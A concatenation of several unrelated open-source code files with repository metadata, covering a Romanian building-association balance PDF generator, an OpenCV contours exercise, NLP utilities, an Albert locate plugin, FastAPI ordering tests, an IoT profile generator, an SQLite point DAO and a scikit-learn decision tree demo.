You should have received a copy of the GNU Affero General Public
License along with Habitam. If not, see
<http://www.gnu.org/licenses/>.
Created on Jul 21, 2013
@author: Stefan Guna
'''
from habitam.downloads.common import habitam_brand, signatures, MARGIN
from reportlab.lib import colors
from reportlab.lib.pagesizes import A4, landscape
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.units import cm
from reportlab.platypus.doctemplate import SimpleDocTemplate
from reportlab.platypus.flowables import Spacer
from reportlab.platypus.paragraph import Paragraph
from reportlab.platypus.tables import Table, TableStyle
import logging
import tempfile
logger = logging.getLogger(__name__)
__HEIGHT__ = A4[0]
__WIDTH__ = A4[1]
def __assets(building, day):
result = {}
# sold in casa si in banca
for mt in ['cash', 'bank']:
is_mt = lambda ac: ac.money_type == mt and ac.type == 'std'
result[mt] = building.balance_by_type(is_mt, day)
aps = building.apartments()
ap_pending = 0
penalties_pending = 0
for ap in aps:
ap_pending = ap_pending + ap.balance(day)
tmp = ap.penalties(day)
if tmp != None:
penalties_pending = penalties_pending + ap.penalties(day)
# lista curenta
result['apartment_pending'] = ap_pending * -1
# restante ale locatarilor
result['penalties_pending'] = penalties_pending * -1
# facturi de la furnizori si prestatori care urmeaza a fi repartizate pe liste.
# everything is automatically distributed to the list
result['outstanding_invoices'] = 0
return result
def __liabilities(building, day):
result = {}
# fond rulment
# fond de reparatii
# fond de penalizari
# fonduri speciale
# facturi de la terti
for t in ['rulment', 'repairs', 'penalties', 'special', '3rd party']:
is_t = lambda ac:ac.type == t
result[t] = building.balance_by_type(is_t, day)
return result
def __balance_format(canvas, doc):
canvas.saveState()
canvas.setFontSize(16)
t = u'Situația soldurilor elementelor de activ și pasiv pentru %s la %s'
canvas.drawCentredString(__WIDTH__ / 2.0, __HEIGHT__ - 100,
t % (doc.habitam_data['building'].name, doc.habitam_data['day']))
habitam_brand(canvas, __WIDTH__, __HEIGHT__)
canvas.restoreState()
def __format_data(data):
styles = getSampleStyleSheet()
assets = data['assets']
liabilities = data['liabilities']
d = [['NR.\nCRT.', 'ELEMENTE DE ACTIV', 'VALORI\n(LEI)', 'ELEMENTE DE PASIV', 'VALORI\n(LEI)'],
['1.', Paragraph(u'Sold în casă', styles['Normal']), assets['cash'], Paragraph('Sold fond de rulment', styles['Normal']), liabilities['rulment']],
['2.', Paragraph(u'Sold conturi la bănci', styles['Normal']), assets['bank'], Paragraph(u'Sold fond de reparații', styles['Normal']), liabilities['repairs']],
['3.', Paragraph(u'Sume neachitate de proprietarii din asociație pentru lista de plată curentă', styles['Normal']), assets['apartment_pending'], Paragraph('Sold fond sume speciale', styles['Normal']), liabilities['special']],
['4.', Paragraph(u'Restanțe existente la data întocmirii acestei situații', styles['Normal']), assets['penalties_pending'], Paragraph('Soldul altor fonduri legal stabilite', styles['Normal']), '0'],
['5.', Paragraph(u'Debitori, alții decât mebrii asociației', styles['Normal']), '0', Paragraph('Furnizori pentru facturi neachitate', styles['Normal']), '0'],
['6.', Paragraph(u'Acte de plată pe luna în curs, nerepartizate proprietarilor', styles['Normal']), assets['outstanding_invoices'], Paragraph(u'Creditori diverși', styles['Normal']), liabilities['3rd party']],
['7.', Paragraph(u'Acte de plăți pentru cheltuielile aferente fondurilor de reparații, speciale, de penalizări care nu au fost încă scăzute din fondurile respective', styles['Normal']), '0', '', ''],
['', Paragraph(u'TOTAL PARTEA I', styles['Normal']), sum(assets.values()), Paragraph(u'TOTAL PARTEA II', styles['Normal']), sum(liabilities.values())]
]
table = Table(d, colWidths=[1.3 * cm, 7 * cm, 4 * cm, 7 * cm, 4 * cm])
table.setStyle(TableStyle([
('FONT', (0, 0), (-1, 0), 'Helvetica-Bold'),
('ALIGN', (0, 0), (-1, 0), 'CENTER'),
('VALIGN', (0, 0), (-1, 0), 'MIDDLE'),
('ALIGN', (0, 0), (0, -1), 'CENTER'),
('VALIGN', (0, 0), (0, -1), 'MIDDLE'),
('ALIGN', (2, 0), (2, -1), 'CENTER'),
('VALIGN', (2, 0), (2, -1), 'MIDDLE'),
('ALIGN', (4, 0), (4, -1), 'CENTER'),
('VALIGN', (4, 0), (4, -1), 'MIDDLE'),
('INNERGRID', (0, 0), (-1, -1), 0.25, colors.black),
('BOX', (0, 0), (-1, -1), 0.25, colors.black)
]))
return table
def __to_pdf(temp, data):
doc = SimpleDocTemplate(temp, pagesize=landscape(A4), leftMargin=MARGIN,
rightMargin=MARGIN, topMargin=MARGIN,
bottomMargin=MARGIN,
title=u'Situația activ/pasiv pentru %s' % data['building'].name,
author='www.habitam.ro')
flowables = [Spacer(1, 6 * cm), __format_data(data), Spacer(1, cm), signatures()]
doc.habitam_data = data
doc.build(flowables, onFirstPage=__balance_format, onLaterPages=__balance_format)
def download_balance(building, day):
data = {'building': building, 'day': day,
'assets': __assets(building, day),
'liabilities': __liabilities(building, day)}
logger.debug('Balance is %s' % data)
temp = tempfile.NamedTemporaryFile()
__to_pdf(temp, data)
return temp
| habitam/habitam-core | habitam/downloads/balance.py | balance.py | py | 6,509 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "reportlab.lib.pagesizes.A4",
"line_number": 38,
"usage_type": "name"
},
{
"api_name": "reportlab.lib.pagesizes.A4",
"line_number": 39,
"usage_type": "name"
},
{
"api_name"... |
23400353850 | import cv2
import numpy as np
from matplotlib import pyplot as plt
import os
os.chdir('C:\\Users\\sachi\\.vscode\\GitHubRepos\\OSCV_Exercises')
exetasknum = 1
# Contours can be explained simply as a curve joining all the continuous points (along the boundary), having same color or intensity. The contours are a useful tool for shape analysis and object detection and recognition.
# For better accuracy, use binary images. So before finding contours, apply threshold or canny edge detection.
# findContours function modifies the source image. So if you want source image even after finding contours, already store it to some other variables.
# In OpenCV, finding contours is like finding white object from black background. So remember, object to be found should be white and background should be black.
if exetasknum==1:
im = cv2.imread('test.jpg')
imgray = cv2.cvtColor(im,cv2.COLOR_BGR2GRAY)
ret,thresh = cv2.threshold(imgray,127,255,0)
contours,hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
major = cv2.__version__.split('.')[0]
if major == '3':
ret, contours, hierarchy = cv2.findContours(im.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) #im.copy()->thresh
else:
contours, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
img = cv2.drawContours(im, contours, -1, (0,255,0), 3)
while True:
cv2.imshow('img', img)
k = cv2.waitKey(1) & 0xFF
if k == 27:
break
# img = cv2.drawContours(img, contours, -1, (0,255,0), 3)
# while True:
# cv2.imshow('All Contours', img)
# k = cv2.waitKey(1) & 0xFF
# if k == 27:
# break
# img = cv2.drawContours(img, contours, 0, (0,255,0), 3)
# while True:
# cv2.imshow('1st Contour', img)
# k = cv2.waitKey(1) & 0xFF
# if k == 27:
# break | sachingadgil/OSCV_Exercises | OpenCV_Python_Tutorials/017 Contours Getting Started.py | 017 Contours Getting Started.py | py | 1,930 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.chdir",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "cv2.imread",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2GRAY",
"line_number... |
34162683454 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import tempfile
from subprocess import PIPE, Popen
import os
import random
import codecs
import math
from sklearn.pipeline import FeatureUnion
from sklearn.pipeline import Pipeline
from resources import SEMEVAL_SCORER_PATH
logger = logging.getLogger(__name__)
def pretty_pipeline(obj):
"""Pretty print a sklearn Pipeline.
This function is especially useful to extract information within
FeatureUnion Pipeline.
Args:
obj: A sklearn Pipeline.
Returns:
A flat version of the Pipeline object.
"""
if isinstance(obj, list):
return [pretty_pipeline(o) for o in obj]
elif isinstance(obj, FeatureUnion):
return {'n_jobs': obj.n_jobs,
'transformer_list': obj.transformer_list,
'transformer_weights': obj.transformer_weights}
elif isinstance(obj, Pipeline):
return {'steps': pretty_pipeline(obj.steps)}
elif isinstance(obj, tuple):
return pretty_pipeline(list(obj))
else:
return obj
def strings_to_integers(strings, labels):
"""Convert an array of strings to an array of integers.
Convert an array of strings to an array of integers where the same
string will always have the same integers value.
Args:
strings: An array of strings.
Returns:
An array of integers
"""
integers = []
for string in strings:
integers.append(labels.index(string))
return integers
def integers_to_strings(integers, labels):
"""Convert an array of integers to an array of strings using labels as
reference.
Args:
integers: An array of integers.
labels: An array of strings where each integers will be
replaced by the string at the index.
Returns:
An array of strings.
"""
strings = []
for integer in integers:
strings.append(labels[integer])
return strings
def merge_classes(lst, classes, new_class):
"""Merge classes from lst into one new_class.
Args:
lst: A list of classes that will be replaced (strings).
classes: A list of classes to replace (strings).
new_class: The new class (string).
Returns:
The list with all occurences of classes replaced by new_class.
"""
for i in range(len(lst)):
if lst[i] in classes:
lst[i] = new_class
return lst
def eval_with_semeval_script(test, predicted):
"""Eval prediction on test with semeval script (T4SA).
Args:
test: variable documentation.
predicted: variable documentation.
Returns:
Returns information
Raises:
IOError: An error occurred.
"""
predicted = integers_to_strings(predicted, test.labels)
ofile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
ret = None
try:
for (sid, pred) in zip(test.sid, predicted):
ofile.write('%s\t%s\n' % (sid, pred))
ofile.close()
p = Popen(['_scripts/SemEval2016_task4_test_scorer_subtaskA.pl',
ofile.name], stdout=PIPE, stderr=PIPE, cwd=SEMEVAL_SCORER_PATH)
out, err = p.communicate()
ret = out + err
ret = ret.decode()
with open(ofile.name + '.scored', 'r') as ifile:
for line in ifile:
ret += line
finally:
if not ofile.closed:
ofile.close()
os.remove(ofile.name)
os.remove(ofile.name + '.scored')
return ret
def assoc_value(lst, value):
"""Return the element associated to value and its index.
Args:
lst: A associative array/list.
value: The value to match on.
Returns:
The element associated to value (with the value itself) and
its index.
"""
for (idx, el) in enumerate(lst):
if el[0] == value:
return el, idx
def invert_dict_nonunique(d):
newdict = {}
for k in d:
newdict.setdefault(d[k], []).append(k)
return newdict
def split_train_valid(input_path, valid_num=3000):
"""Split a file in two (.valid and .train) with valid_num lines in
.valid and everything else in .train.
"""
train_path = input_path + '.train'
valid_path = input_path + '.valid'
nb_line = 0
with codecs.open(input_path, 'r', 'utf-8') as ifile:
nb_line = len([line for line in ifile])
if valid_num <= 1 and valid_num >= 0:
valid_num = math.floor(nb_line * valid_num)
valid_indexes = random.sample(range(nb_line), valid_num)
try:
ifile = codecs.open(input_path, 'r', 'utf-8')
train_file = codecs.open(train_path, 'w+', 'utf-8')
valid_file = codecs.open(valid_path, 'w+', 'utf-8')
idx = 0
for line in ifile:
try:
v_idx = valid_indexes.index(idx)
valid_file.write(line)
del valid_indexes[v_idx]
except ValueError:
train_file.write(line)
idx += 1
finally:
ifile.close()
train_file.close()
valid_file.close()
def opinion_lexicon_to_graph(lexicon):
"""Return a undirected graph from lexicon.
LEXICON is an opinion lexicon where each key is a class and the value
associated to it is a list of words that belongs to the class.
This function will build a undirected graph where each node are words
and the edges between nodes represent a similarity relationship. There
will be an edge between two words if they belong to the same class.
In practice, this method returns a dictionnary where a key is a word
of LEXICON and the value associated to it are all words from the same
class.
This is intended to be used by emb.build_custom3
"""
ret = {}
lexicon_inv = invert_dict_nonunique(lexicon)
for c in lexicon_inv:
words = lexicon_inv[c]
for word in words:
ret[word] = words
return ret
def split_lexicon_train_test(lexicon, ratio=0.9, shuffle=False):
"""Split each class of the lexicon in train and test.
Args:
lexicon: A lexicon to split.
ratio: The ratio of train/test. 0.9 means 90% of the lexicon
will go in the train lexicon.
shuffle: A boolean to specify that the lexicon should be
shuffled before splitting.
Returns:
A train lexicon and a test lexicon.
"""
train_lexicon = {}
test_lexicon = {}
lexicon_inv = invert_dict_nonunique(lexicon)
for c in lexicon_inv:
c_words = lexicon_inv[c]
n = len(c_words)
if shuffle:
random.shuffle(c_words)
limit = math.floor(n * ratio)
for w in c_words[:limit]:
train_lexicon[w] = c
for w in c_words[limit:]:
test_lexicon[w] = c
return train_lexicon, test_lexicon
def remove_multi_words_in_lexicon(lexicon):
"""Remove multi-words in lexicon"""
ret = {}
for w in lexicon:
if len(w.split(' ')) == 1:
ret[w] = lexicon[w]
return ret
| daimrod/opinion-sentence-annotator | utils.py | utils.py | py | 7,027 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "sklearn.pipeline.FeatureUnion",
"line_number": 36,
"usage_type": "argument"
},
{
"api_name": "sklearn.pipeline.Pipeline",
"line_number": 40,
"usage_type": "argument"
},
{
... |
5986988615 | from albert import *
import os
import pathlib
import shlex
import subprocess
md_iid = '1.0'
md_version = "1.8"
md_name = "Locate"
md_description = "Find and open files using locate"
md_license = "BSD-3"
md_url = "https://github.com/albertlauncher/python/tree/master/locate"
md_bin_dependencies = "locate"
class Plugin(TriggerQueryHandler):
def id(self):
return md_id
def name(self):
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "'"
def synopsis(self):
return "<locate params>"
def initialize(self):
self.icons = [
"xdg:preferences-system-search",
"xdg:system-search",
"xdg:search",
"xdg:text-x-generic",
str(pathlib.Path(__file__).parent / "locate.svg")
]
def handleTriggerQuery(self, query):
if len(query.string) > 2:
try:
args = shlex.split(query.string)
except ValueError:
return
result = subprocess.run(['locate', *args], stdout=subprocess.PIPE, text=True)
if not query.isValid:
return
lines = sorted(result.stdout.splitlines(), reverse=True)
if not query.isValid:
return
for path in lines:
basename = os.path.basename(path)
query.add(
Item(
id=path,
text=basename,
subtext=path,
icon=self.icons,
actions=[
Action("open", "Open", lambda p=path: openUrl("file://%s" % p))
]
)
)
else:
query.add(
Item(
id="updatedb",
text="Update locate database",
subtext="Type at least three chars for a search",
icon=self.icons,
actions=[
Action("update", "Update", lambda: runTerminal("sudo updatedb"))
]
)
)
| m0lw9re/albert | plugins/python/plugins/locate/__init__.py | __init__.py | py | 2,227 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pathlib.Path",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "shlex.split",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "subprocess.run",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "subprocess.PIPE",
"line_n... |
30942866367 | from rest_framework import serializers
from .models import Product, Ingredient
class IngredientSerializer(serializers.ModelSerializer):
class Meta:
model = Ingredient
fields = ('title', 'price')
class ProductSerializer(serializers.ModelSerializer):
ingredients = IngredientSerializer(read_only=True, many=True)
class Meta:
model = Product
fields = ('id', 'product_type', 'title',
'image', 'description', 'price', 'ingredients')
| Dawid-Dahl/stereo-nightclub-api | api/serializers.py | serializers.py | py | 495 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "rest_framework.serializers.ModelSerializer",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "rest_framework.serializers",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "models.Ingredient",
"line_number": 7,
"usage_type": "name"
},
... |
71713005863 | import requests
class ApiBaseActions:
def __init__(self, base_url):
if base_url.endswith("/"):
self.base_url = base_url
else:
self.base_url = base_url + "/"
self.session = requests.Session()
def make_request(self, method: str, route_url: str = None, **kwargs):
request_methods = {"GET": self.session.get,
"POST": self.session.post
}
if route_url is not None:
if route_url.startswith("/"):
route_url = route_url[1:]
reuest_url = self.base_url + route_url
if request_methods.get(method) is not None:
print(f" making {method} request to {reuest_url}")
response = request_methods[method](reuest_url, **kwargs)
else:
raise NameError("Invalid API method provided")
return response
| HarshDevSingh/python-behave | api/api_base.py | api_base.py | py | 906 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.Session",
"line_number": 10,
"usage_type": "call"
}
] |
75215887145 | import streamlit as st
from transformers import pipeline
# 👈 Add the caching decorator
@st.cache(allow_output_mutation=True)
def load_model():
return pipeline("sentiment-analysis")
model = load_model()
query = st.text_input("Your query")
if query:
result = model(query)[0] # 👈 Classify the query text
st.write(result["label"])
| Jaggusms/sentiment_analysis_higgingFace | app.py | app.py | py | 349 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "transformers.pipeline",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "streamlit.cache",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "streamlit.text_input",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "streamlit.wr... |
10691268780 | import sqlite3 as sql
from sqlite3 import OperationalError
from pythonobjet.exo1_formesgeometriques.point.Point import Point
class PointDao:
"""Ma classe"""
def __init__(self):
pass
def initialisation(self):
connecteur = sql.connect("donnee.db")
curseur = connecteur.cursor()
requete = "create table pointTable(col1 integer, col2 integer)"
try:
curseur.execute(requete)
except OperationalError as e:
print ("ope=",e)
connecteur.commit()
connecteur.close()
def insertPoint (self, point):
connecteur = sql.connect("donnee.db")
curseur = connecteur.cursor()
requete = f"insert into pointTable(col1, col2) values ({point.getX()},{point.getY()})"
curseur.execute(requete)
connecteur.commit()
connecteur.close()
def listePoints (self):
listePoints = []
connecteur = sql.connect("donnee.db")
curseur = connecteur.cursor()
requete = "select * from pointTable"
curseur.execute(requete)
for ligne in curseur.fetchall():
listePoints.append(Point(ligne[0], ligne[1]))
connecteur.close()
return listePoints
if __name__ == "__main__":
print("================ debut point dao ==================")
#initialisation
pointDao = PointDao()
pointDao.initialisation()
# insertion points
p1 = Point(0,0)
p2 = Point(1,1)
pointDao.insertPoint(p1)
pointDao.insertPoint(p2)
#lister point
listep = pointDao.listePoints()
print("La liste est ", listep )
| silvaplana/pythontraining | pythonobjet/exo1_formesgeometriques/point/PointDao.py | PointDao.py | py | 1,627 | python | fr | code | 0 | github-code | 36 | [
{
"api_name": "sqlite3.connect",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "sqlite3.OperationalError",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "sqlite3.connect",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "sqlite3.conn... |
3314005552 | import time, json, os, logging, requests
from cumulocityAPI import C8Y_BASEURL, C8Y_TENANT, C8Y_HEADERS, CumulocityAPI
from arguments_handler import get_profile_generator_mode
from oeeAPI import OeeAPI
def try_int(value):
try:
return int(value)
except:
return None
PROFILES_PER_DEVICE = try_int(os.environ.get('PROFILES_PER_DEVICE')) or 1
SLEEP_TIME_FOR_PROFILE_CREATION_LOOP = try_int(os.environ.get('SLEEP_TIME_FOR_PROFILE_CREATION_LOOP')) or 60 * 12
MODE = get_profile_generator_mode()
# JSON-PYTHON mapping, to get json.load() working
null = None
false = False
true = True
######################
logging.basicConfig(format='%(asctime)s %(name)s:%(message)s', level=logging.INFO)
log = logging.getLogger("profile-generator")
log.info("using C8Y backend:" + C8Y_BASEURL)
log.info("using C8Y tenant:" + C8Y_TENANT)
c8y_api = CumulocityAPI()
oee_api = OeeAPI()
def delete_profiles():
simulator_ids = oee_api.get_simulator_ids()
deleted_profiles = 0
for simulator_id in simulator_ids:
log.info(f'deleting profiles for {simulator_id}')
response = requests.get(f'{C8Y_BASEURL}/inventory/managedObjects/{simulator_id}', headers=C8Y_HEADERS)
if response.ok:
child_devices = response.json()['childDevices']['references']
for child_device in child_devices:
child_device_id = child_device['managedObject']['id']
child_device_json = c8y_api.get_managed_object(child_device_id)
if child_device_json['type'] == c8y_api.OEE_CALCULATION_PROFILE_TYPE:
log.info(f'deleting managed object {child_device_id}')
deleted_profiles = deleted_profiles + c8y_api.delete_managed_object(child_device_id)
else:
log.warning(f'Couldn\'t find the managed object. response: {response}, content: {response.text}')
log.info(f'profiles deleted: {deleted_profiles}')
if MODE == 'createProfiles':
log.info('===============================')
log.info('starting to create profiles ...')
log.info(f'existing profiles: {c8y_api.count_all_profiles()}')
counter = 0
for _ in range(PROFILES_PER_DEVICE):
for external_id in oee_api.get_simulator_external_ids():
profile = oee_api.create_and_activate_profile(external_id)
counter = counter + 1
if counter % 200 == 0:
log.info(f'profiles: {c8y_api.count_all_profiles()}. Wait for {SLEEP_TIME_FOR_PROFILE_CREATION_LOOP} minutes')
# sleep for some time to be able to verify if calculation is still working with the given number of profiles
time.sleep(SLEEP_TIME_FOR_PROFILE_CREATION_LOOP)
log.info(f'profiles after execution: {c8y_api.count_all_profiles()}')
if MODE == 'removeSimulatorProfilesViaOee':
log.info('===============================================')
log.info('starting to remove all simulator profiles via OEE API ...')
log.info(f'existing profiles: {c8y_api.count_all_profiles()}')
oee_api.delete_all_simulators_profiles()
log.info(f'profiles after execution: {c8y_api.count_all_profiles()}')
if MODE == 'deleteSimulatorProfiles':
log.info('===================================')
log.info('starting to delete all simulator profiles ...')
log.info(f'existing profiles: {c8y_api.count_all_profiles()}')
delete_profiles()
log.info(f'profiles after execution: {c8y_api.count_all_profiles()}')
if MODE == 'deleteCalculationCategories':
log.info('===================================')
log.info('starting to delete all calculation categories ...')
log.info(
f'existing category managed objects: {c8y_api.count_all_categories()}')
deleted_categories = 0
for category in c8y_api.get_calculation_categories():
deleted_categories += c8y_api.delete_managed_object(category['id'])
log.info(f'Managed_objects deleted: {deleted_categories}')
if MODE == 'createCalculationCategories':
log.info('===================================')
log.info('starting to create calculation categories ...')
with open('./categories.json', 'r') as f:
categories = f.read()
if (c8y_api.count_all_categories()) == 0:
log.info('Create category managed object')
c8y_api.create_managed_object(categories)
elif (c8y_api.count_all_categories()) == 1:
log.info('Update category managed object')
categories_by_id = {}
for c in json.loads(categories)['categories'] + c8y_api.get_calculation_categories()[0]['categories']:
categories_by_id[c['id']] = c
mo_id = c8y_api.get_calculation_categories()[0]['id']
fragment = {
'categories': list(categories_by_id.values())
}
c8y_api.update_managed_object(mo_id, json.dumps(fragment))
else:
log.warning('More than 1 category managed object! Unable to update managed object')
log.info('==========Categories created==========')
| SoftwareAG/oee-simulators | simulators/main/profile_generator.py | profile_generator.py | py | 5,006 | python | en | code | 8 | github-code | 36 | [
{
"api_name": "os.environ.get",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "os.environ.get",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_... |
70874377705 | from decimal import Decimal
from random import random
from unittest.mock import ANY, Mock
from uuid import UUID, uuid4
from fastapi import FastAPI
from injector import InstanceProvider
from mockito import when
from pytest import fixture, mark
from currency import Currency
from ordering import Service as OrderingService
from ordering import commands, errors
from ordering.queries import BuyOrdersQueries
from tests.ordering.factories import BuyOrderFactory as BuyOrder
from .factories import ApiCreateBuyOrderRequestFactory as CreateBuyOrder
CREATE_ORDER_URL = "/orders/"
class TestCreateBuyOrderRequest:
def test_after_creating_redirects_to_created_order(self, api_client):
request = CreateBuyOrder()
response = api_client.post(CREATE_ORDER_URL, json=request)
assert response.status_code == 201
order_url = response.headers["Location"]
order = api_client.get(order_url).json()
assert order["request_id"] == request["request_id"]
def test_creating_order_is_idempotent(self, api_client):
request = CreateBuyOrder()
first = api_client.post(CREATE_ORDER_URL, json=request)
second = api_client.post(CREATE_ORDER_URL, json=request)
assert first.headers["Location"] == second.headers["Location"]
@mark.parametrize(
"request_id", ["ILLEGAL", uuid4().hex[:-3], "", random(), None]
)
def test_reject_when_no_uuid_id(self, api_client, request_id):
request = CreateBuyOrder().update(request_id=request_id)
response = api_client.post(CREATE_ORDER_URL, json=request)
assert response.status_code == 422
def test_reject_when_negative_amount(self, api_client):
request = CreateBuyOrder().update(amount=-1)
response = api_client.post(CREATE_ORDER_URL, json=request)
assert response.status_code == 422
def test_reject_when_amount_higher_than_1_000_000_000(self, api_client):
request = CreateBuyOrder().update(amount=1_000_000_000)
response = api_client.post(CREATE_ORDER_URL, json=request)
assert response.status_code == 422
@mark.parametrize("currency", ["PLN", "AUD", "XXX"])
def test_reject_when_currency_not_eur_gbp_usd(self, api_client, currency):
request = CreateBuyOrder().update(currency=currency)
response = api_client.post(CREATE_ORDER_URL, json=request)
assert response.status_code == 422
class TestCreateBuyOrderController:
def test_201_when_created(
self, app, api_client, create_buy_order, order_url,
):
response = api_client.post(CREATE_ORDER_URL, json=create_buy_order)
assert response.status_code == 201
assert response.headers["Location"] == order_url
def test_301_when_already_created(
self, api_client, ordering, order_id, order_url,
):
when(ordering).create_buy_order(...).thenRaise(
errors.OrderAlreadyExists(order_id)
)
response = api_client.post(CREATE_ORDER_URL, json=CreateBuyOrder())
assert response.status_code == 301
assert response.headers["Location"] == order_url
def test_409_when_order_limit_exceeded(self, api_client, ordering):
when(ordering).create_buy_order(...).thenRaise(
errors.BalanceLimitExceeded(Decimal(100))
)
response = api_client.post(CREATE_ORDER_URL, json=CreateBuyOrder())
assert response.status_code == 409
assert response.json()["detail"] == "Exceeded 100BTC ordering limit"
@fixture
def create_buy_order(self) -> dict:
return CreateBuyOrder()
@fixture
def order_id(self) -> UUID:
return uuid4()
@fixture
def order_url(self, app: FastAPI, order_id: UUID) -> str:
return app.url_path_for("orders:get_order", order_id=str(order_id))
@fixture(autouse=True)
def ordering(
self, container, create_buy_order, order_id,
) -> OrderingService:
service = Mock(spec=OrderingService)
container.binder.bind(OrderingService, to=InstanceProvider(service))
queries = Mock(spec=BuyOrdersQueries)
container.binder.bind(BuyOrdersQueries, to=InstanceProvider(queries))
request_id = UUID(hex=create_buy_order["request_id"])
when(queries).get_order_id(request_id).thenReturn(order_id)
when(service).create_buy_order(
commands.CreateBuyOrder.construct(
id=request_id,
amount=(
Decimal(create_buy_order["amount"])
.quantize(Decimal(10) ** -4)
),
currency=Currency[create_buy_order["currency"]],
timestamp=ANY,
)
).thenReturn(order_id)
return service
class TestGetBuyOrderController:
def test_404_when_no_order(self, api_client):
response = api_client.get(f"/orders/{uuid4()}")
assert response.status_code == 404
def test_order_data_when_order_exists(self, api_client, order):
response = api_client.get(f"/orders/{order.id}")
assert response.json() == {
"id": str(order.id),
"request_id": str(order.request_id),
"bitcoins": float(order.bitcoins),
"bought_for": float(order.bought_for),
"currency": order.currency.name,
}
@fixture
def order(self) -> BuyOrder:
return BuyOrder()
@fixture(autouse=True)
def queries(self, container, order) -> BuyOrdersQueries:
queries = Mock(BuyOrdersQueries)
when(queries).get_order(...).thenReturn(None)
when(queries).get_order(order.id).thenReturn(order)
container.binder.bind(BuyOrdersQueries, to=InstanceProvider(queries))
return queries
| lzukowski/workflow | tests/application/test_api.py | test_api.py | py | 5,764 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "factories.ApiCreateBuyOrderRequestFactory",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "factories.ApiCreateBuyOrderRequestFactory",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "factories.ApiCreateBuyOrderRequestFactory",
"line_number"... |
30591789155 | from __future__ import annotations
from grammar import Grammar, reduce_left_recursion, chomsky_normal_form
from dacite import from_dict
import json
def main():
filename = input("Input file name:") or "data.json"
print(f'using file {filename}')
with open(filename, "r") as f:
data = json.load(f)
g = from_dict(data_class=Grammar, data=data)
print("--------- Input grammar -----------")
g.print()
print("--------- Left Recursion Elimination -----------")
g = reduce_left_recursion(g)
g.print()
print("--------- Chomsky Normal Form -----------")
g = chomsky_normal_form(g)
g.print()
if __name__ == "__main__":
main()
| fairay/Compilers | lab2/main.py | main.py | py | 682 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "json.load",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "dacite.from_dict",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "grammar.Grammar",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "grammar.reduce_left_recurs... |
9211558964 | import sys
import os
import time
import traceback
import pandas as pd
import seaborn as sns
import pydotplus
import matplotlib.pyplot as plt
import numpy as np
from sklearn.tree import export_graphviz
from sklearn import tree
from sklearn.model_selection import train_test_split
from sklearn.model_selection import GridSearchCV, RandomizedSearchCV
from sklearn import datasets
from sklearn.utils import shuffle
from sklearn.metrics import mean_squared_error
from sklearn.metrics import confusion_matrix, classification_report
sys.path.append('../')
from SOL4Py.ZApplicationView import *
from SOL4Py.ZLabeledComboBox import *
from SOL4Py.ZPushButton import *
from SOL4Py.ZVerticalPane import *
from SOL4Py.ZTabbedWindow import *
from SOL4Py.ZMLModel import *
from SOL4Py.ZScalableScrolledFigureView import *
from SOL4Py.ZScalableScrolledDecisionTreeView import*
Iris = 0
Digits = 1
Wine = 2
BreastCancer = 3
############################################################
# Classifier Model class
class DecisionTreeClassifierModel(ZMLModel):
##
# Constructor
def __init__(self, dataset_id, mainv):
super(DecisionTreeClassifierModel, self).__init__(dataset_id, mainv)
def run(self):
self.write("====================================")
self._start(self.run.__name__)
try:
# 1 Load dataset
self.load_dataset()
# 2 Load or create model
if self.trained():
# 2.1 if trained, load a trained model pkl file
self.load()
else:
# 2.2 else create a model, and train and save it
self.build()
self.train()
self.save()
# 3 Predict for test_data
self.predict()
# 4 Visualize the prediction
self.visualize()
except:
traceback.print_exc()
self._end(self.run.__name__ )
def load_dataset(self):
self._start(self.load_dataset.__name__ )
if self.dataset_id == Iris:
self.dataset= datasets.load_iris()
self.write("loaded iris dataset")
if self.dataset_id == Digits:
self.dataset= datasets.load_digits()
self.write("loaded Digits dataset")
if self.dataset_id == Wine:
self.dataset= datasets.load_wine()
self.write("loaded Wine dataset")
if self.dataset_id == BreastCancer:
self.dataset= datasets.load_breast_cancer()
self.write("loaded BreastCancer dataset")
attr = dir(self.dataset)
self.write("dir:" + str(attr))
if "feature_names" in attr:
self.write("feature_names:" + str(self.dataset.feature_names))
if "target_names" in attr:
self.write("target_names:" + str(self.dataset.target_names))
self.set_model_filename()
self.view.description.setText(self.dataset.DESCR)
X, y = self.dataset.data, self.dataset.target
